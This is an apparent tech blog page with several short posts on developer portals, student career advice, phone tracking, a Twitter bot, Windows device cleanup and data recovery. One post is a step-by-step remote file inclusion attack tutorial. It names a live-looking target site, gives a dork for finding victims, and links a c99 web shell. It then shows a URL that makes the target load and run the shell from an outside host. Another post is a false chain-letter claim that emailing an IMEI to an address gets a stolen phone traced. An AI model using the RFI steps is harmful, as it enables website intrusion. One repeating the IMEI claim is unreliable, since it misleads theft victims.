“When solving problems, dig at the roots instead of just hacking at the leaves.”

~Anthony J. D'Angelo

Awesome + Resourceful Web Portals


Check out the following Microsoft Web portals that caters to need of almost everyone. The Portal name is followed by a brief description.

1.
  • Webspark
  • : It’s for small IT enterprises. Microsoft provides them the tools needed for Designing and development for FREE!. There is no upfront cost for first 3 years. Terms and conditions do apply, but they seem to be obvious For eg : You need to deploy a website before 6 months, renew your subscription after few months, etc. Above all, it is for all budding webmasters!

    2.
  • Bizspark
  • : To me, bizspark.com is extension of websitespark.com. Fundamentally it is for Tech startup’s that need support and visibility. This one is meant for all techno-preneurs!

    3.
  • Dream Spark
  • FREE software’s ( like Visual Studio professional! ) for students.

    4.
  • Microsoft Student to Business
  • : To bridge the gap between Industry requirements and Student’s knowledge. The website has list of Job and Internship openings of various tech firms. it’s for all those who dream to be corporate czars!

    Thanks 4 Reading

    Read more

    Seven Steps to become a world class computer Engineer


    Reasons for writing this post:

    * I feel I have not done enough to become a good computer engineer. May be I did not have someone who could guide me properly. We were only the second batch of Computer Engineering at Nirma Institute of Technology, Ahmedabad, so we had no mentors in the industry.
    * Second reason, may be we were not mature enough.
    * Third reason, 3 Idiots was not released at that time.
    * So this post is dedicated to all the fellow computer engineering students (especially in India) who are still having a good time by bunking the classes but not doing good enough to become a world class computer engineer otherwise.

    But what can I do?



    1. Have the right infrastructure

    * Get yourself a decent laptop. (I prefer Mac but any decent Dell laptop is also ok)
    * Get yourself a nice internet connection with highest speed available. (Take a cut from your pocket money if you have to but this is a must)
    * Get yourself an iPhone (I know it is expensive in India but you will have to use world class gadgets to become world class engineer)
    * Make your home or hostel room WiFi enabled. (This is not expensive. You will get a decent router in 2-3k.)
    * If you are not able to do any or all of the above things, don’t worry you can still become a good computer engineer. So hang on and keep reading.

    2. Learn to use Google Reader

    * Google reader will become the best companion of yours for lifetime if you use it properly.
    * It is nothing but a cool RSS reader from Google using which you can subscribe to blogs to get latest updates and posts. So if you have a gmail account you are ready to go. What? You do not have a gmail account yet!! Go get one right now. Stop reading. Open a gmail account now and come back. I am waiting.
    * I am still waiting.
    * Ok great, so you have a gmail account now, good. Watch this video . It explains in plain english how to use google reader.
    View This video for Google reader In plain english
    How?

    * Software, Web Search Strategies, Wikis, Social Bookmarking, Social Networking, Blogs, Podcasting and Cloud computing on http://www.commoncraft.com/ (Now you understand why I told you get the fastest internet connection available?). You don’t have to see them all at once but do check them all and understand.
    * Done? Ok so you are ready to become a world class computer engineer now.
    * Now you understand Google Reader, so it’s time to subscribe to interesting blogs. Subscribe to following blogs.
    o Techcrunch.com (King of Technology Blogs)
    o Gigaom.com (Michale Arrington of Techcrunch considers Om as his Guru)
    o ReadWriteWeb.com
    o Pluggd.in (Indian Techcrunch)
    o JoelOnSoftware.com (a must read for programmers)
    o CodingHorror.com (another must read for programmers)
    * There are many such blogs but to start with these are ok. You will keep finding other interesting blogs as and when you will come across some.
    * Getting used to read on computer takes time and patience so just keep reading it.
    * So I guess we are done with Google Reader part here. This means you have to open up Google Reader as soon you bunk the classes or as soon as you get the time to check your mails.

    3. Academic Earth

    * Do you want to see how professors teach in Harvard and Stanford? Do you want to see how their lectures are conducted? You can now, we were not able to do that in our time.
    * Go to www.academicearth.org and you will see videos of actual lectures and courses of Harvard, Yale, Stanford. Now you know whose lectures to watch after bunking the classes or after getting back to home.
    * You do not want to miss the chance of studying in these universities without going to US to giving them millions in fees right? and guess what? Attendance is not compulsory here :)

    4. Learn any web language quickly and start building

    * I would suggest PHP or Ruby. ASP.NET C# is also fine if you already know something about it.
    * And start building something on it. It can be anything. But start programming on web now. Most of you are never going to write a program C, C++ or COBOL in your lifetime. I would not advise against learning them though.
    * After you know something about web programming, read “Getting Real” from 37Signals.
    * Now again build something using whatever you learned from the above book.

    5. Assume you are in Sillicon Valley

    * I know this sounds little weird but that’s the way it is.
    * The best of the minds in the world are there and you do not want to miss out on that right?
    * Thousands of things happen everyday in Sillicon Valley and you can remain updated by reading above blogs I mentioned.
    * So start feeling the air :)

    6. Start asking why?

    * When you are attending a lecture or reading anything, have a habit of asking why?
    * For e.g. Why we have to study “Strength of Materials” when most of us are going to write web applications in PHP or ASP.NET?
    * When you ask why often, you start understanding the logic, the reason behind doing anything.
    * Same as they have said in 3 Idiots, don’t learn to get marks but learn to know something, to achieve the excellence. When you start asking why, you start on the right path.

    7. Understand computer hardware

    * Most people thinks this is boring and unnecessary.
    * May be it is, but it will certainly make you better programmer, even if you will never touch the inside of the computer again.
    * Basic understanding of hardware is necessary to understand how computer works.
    * You have to understand following 100% without any doubt in your mind.
    o How your high level programming code becomes 0s and 1s and execute?
    o The text which you are reading now is also consisting of 0s and 1s only then how come you are reading the alphabets here?
    o FYI I am still not 100% clear on this. But I will be one day. Till then I am not a good computer engineer.

    I guess I have get you started here.

    By following any or all of the above steps you are destined to become world class computer engineer. By no means I am asking you to stop whatever you are doing right now in your college.
    These are additional things you have to do. It takes hard work to become world class right?

    You are always on your own to achieve the path of excellence. Friends and Tutors can only guide you, they can not make you one.

    I would request my fellow classmates to add points in this post. I believe our batch 99CE in Nirma Institue of Technology had one of the best and brightest minds in the world. Do you have any doubt? Well this guy is one of them. 99CE people are in MIT, Google, Apple, Barclays, Bank of America to name a few. They are spread across the world and are on their way to become future leaders.

    I would also request people who have read this post and feel they can add something here to help students of computer engineering. My aim is to have great people coming out of Indian Engineering Colleges.

    Last words, by no means above list is exhaustive and complete. There are “n” number of ways to achieve excellence. These are my personal views and I have learned them long and hard way. I hope to make your journey little easier by this post.


    Read more

    Hack a Website Using Remote File Inclusion


    Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

    Searching the Vulnerability

    Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one


    www.Targetsite.com/index.php?page=Anything

    To find the vulnerability the hacker will most commonly use the following Google Dork

    “inurl:index.php?page=”

    This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

    www.targetsite.com/index.php?page=www.google.com

    Lets say that the target website is http://www.cbspk.com

    So the hacker url will become

    http://www.cbspk.com/v2/index.php?page=http://www.google.com

    If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

    Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

    http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

    The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

    Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

    http://h1.ripway.com/rafaybaloch/c99.txt

    Now here is how a hacker would execute the following command to gain access

    http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

    Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it


    Read more

    Track your lost mobile


    Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.

    This is how it works!!!!!!


    1. Dial *#06# from your mobile.
    2. Your mobile shows a unique 15 digit .
    3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
    4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
    5. No need to go to police.
    6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
    7. You will find where your hand set is being operated even in case your no is being changed.

    PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

    If u lost your mobile, send an e-mail to cop@vsnl.netwith the following info.
    Your name:
    Address:
    Phone model:
    Make:
    Last used No.:
    E-mail for communication:
    Missed date:
    IMEI No.:


    Read more

    Hack Twitter Using Twitter Bot


    Twitter is becoming an important marketing tool for online publishers and marketers. But it can be time consuming to keep your profile up to date and it often gets forgotten. I guess Everybody is waiting for a Solution. So Today I will give you a software
    which will automate all your twitter tasks.

    Twitter Bot can do a lot of amazing things without any need of User Intervention thats why it is called a Bot. Why one should have this software? I would say checkout the functions of this software and you will get your answer.
    Features

    1. Auto add followers: The twitter bot will add 500 new friends on a daily basis. Many of those follower may follow you in return.

    2. Auto Unfollow those who are not following you: It will automatically unfollow those who are not following you.

    3. Auto Follow those who follow you: You can return favor to your followers by following them and that by a click of a button


    4. Follow Top 100 People from your Country: You can target users from a particular Country based on Time Zones

    5. Auto Follow By Keyword Search: You can target user based on Specific Keywords.

    6. Auto Update your status: You can update your status every X minutes and these Updates will be fetched from a Text File.

    7. Auto reply: You can set a Message which will be replied automatically on arrival of a message.

    8. Multiple accounts handling: You can handle multiple Accounts. Twitter Bot can handle all of them in the background doing all the functions.

    9. Works with proxies or Real IP: The twitter bot can run behind proxies. You set a text file with a list of proxies in format IP:Port (ex. 123.123.123.123:80) and the twitter bot will first check to see which of them are working, and then it will use the working ones to login to your accounts and do the functions that you neet it to do.

    10. Extract and import your followers: You can extract the list of followers into XML or Text file.

    11. Schedule Messages: You can schedule the Bot to Update your Twitter status on a Specified Date and Time.

    12. Reply based on Keywords: You can set the Bot to reply based on the Keyword found in arrived Message.
    Conclusion

    After mentioning all these features I don’t need to say much about this Software. I would say just go and grab this software.
    Download

    To get your copy of Twitter Bot Click Here


    Read more

    How to Uninstall Ghosted Devices from Windows


    Do you know that your computer can be full of Ghosted Devices? And like Humans are scared of real world Ghosts your Computer is also scared of these Virtual Ghosts. Presence of such ghosts causes deterioration in the Startup Speed and Overall Computer speed.

    In simple language Ghosted Devices, commonly known as Hidden Devices, are those devices that were once connected to the system but are no longer connected. Windows however keeps a copy of them inside the Device Manager and tries to find these devices on system startup, thus reducing the startup speed(often negligible) in some cases.

    As an example, lets consider a mouse that you borrowed from a friend, after using it you returned him the next day. When it was first connected, Windows installed the required drivers and when it was removed, Windows marked it as ‘Ghosted Device’. Now since you will probably never use this mouse again, it makes sense to remove it.

    The common way of removing the device is to go to Device Manager, view hidden devices, right-click the device(s), hit Uninstall, and wait. Since it can be confusing at some times, this is where GhostBuster comes in. It is a portable tool that can list all Ghosted and Normal devices in one simple list and allows you to remove them in one click.
    Please note that these “Ghosted Devices” can be useful as well and is one reason why Windows never looks for drivers every time you connect the device.

    Suppose you connect a mouse after a few months after borrowing from a another friend and it turns out to be the same mouse that you borrowed from a friend before. Upon connecting it, you will be able to use the mouse instantly since Windows will not need to re-install the drivers. In layman’s term, the Ghosted device will become activated instantly and thus will not require driver installation again.

    Note: Windows has some devices that are ghosted but should NEVER be removed(like devices in the sound, video and game controller class or system and non plug-n-play devices), GhostBuster marks them down as services. Make sure you know which device you are removing, consider this a warning.

    It works on Windows XP, Windows Vista, and Windows 7. If you are using Vista or 7, go to Properties and run it in Windows XP compatibility mode.


    Read more

    How to Recover Important Data after your System is Crashed


    Suppose your computer commits suicide by inviting the latest virus and you are not able to get it back up and running. As a last resort you decide to backup your important documents, photos that you took of your girl friend and the ASCII text file containing your passwords. Today I will show how to do this very easily.
    Create a System Rescue CD

    Use an uninfected computer and download the System Rescue CD ISO file (latest version) from sysresccd.org. Now burn this ISO to a blank CD.
    Start the rescue

    After the ISO is written to CD, take it out, pop the CD into the drive of the computer that’s busted. Set the BIOS to boot through the CD first, hard disk next. And allow it to reboot.

    You should see this beautiful System Rescue startup screen. Type these options after the boot: prompt and press ENTER.

    rescuecd docache dostartx dodhcp

    The docache option allows you to remove the System Rescue CD after it boots up, so you can enter another blank CD/DVD and take backups.

    The dostartx option starts GUI automatically.

    The dodhcp opiton automatically configures the network and connects you automatically to the Internet after booting.

    Load the appropriate keymap when prompted (or just select the default US keymap).

    It should start GUI automatically. In case it doesn’t, type startx at the command line and press ENTER.

    Your desktop should have a terminal with a yellow background. We need to mount the partition and then do the backup.

    Your Windows partition will most likely be located in /mnt/sda1 or /mnt/sda2. To check the partitions, run this:

    fdisk -l /dev/sda

    It should show you the partition names.

    Then, to mount partition 1, run this:

    ntfs-3g /mnt/sda1 /mnt/windows

    If it mounts correctly, you should be able to see the files in your C:\ directory when you type:

    ls -al /mnt/windows

    Backing up your data to a CD/DVD

    Now, to begin backing up your data, type this:

    xfburn

    The Xfburn program will show you a list of your partitions. Browse to the Windows partition(s) using the Filesystem menu option on the top-left and select all the files you need. Click on New Data Composition. Insert a blank CD or DVD and allow to burn all your data to the CD/DVD.
    Backing up your data to a remote location

    This is easier if you love using the command line. First, make sure the network is up by pinging to google.com

    ping google.com

    If it throws up an error, you have to run this to configure your network interface:

    net-setup eth0

    If you want to transfer the files in the directory C:\work to your remote server myremoteserver.com as user hungryhackers

    The directory C:\work would be located in /mnt/windows/work. This command will transfer the directory:

    scp -r /mnt/windows/work hungryhackers@myremoteserver.com


    Read more